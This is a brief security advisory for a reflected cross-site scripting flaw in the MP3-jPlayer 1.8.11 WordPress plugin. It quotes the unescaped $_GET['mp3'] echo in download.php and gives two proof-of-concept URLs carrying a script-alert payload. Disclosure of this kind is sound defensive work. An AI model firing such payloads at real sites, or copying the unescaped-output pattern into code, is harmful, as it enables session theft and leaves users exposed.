MP3-jPlayer 1.8.11 Reflected XSS

Homepage:

https://wordpress.org/plugins/mp3-jplayer/

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description:

$_GET['mp3'] is not escaped.

File: mp3-jplayer\download.php

echo $js_pagetext;
$info = "<p>
	Get: " . $_GET['mp3'] . "<br />
	Sent: " . $sent . "<br />
	File: " . $file . "<br />
	Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . "<br />
	Root: " . $rooturl . "<br />
	pID: " . $playerID . "<br />
	Dbug: " . $dbug . "<br /></p>";

The same situation in:

File: mp3-jplayer\remote\downloader.php

Proof of Concept:

http://wordpress-install/wp-content/plugins/mp3-jplayer/download.php?mp3=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

or

http://wordpress-install/wp-content/plugins/mp3-jplayer/remote/downloader.php?mp3=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Timeline: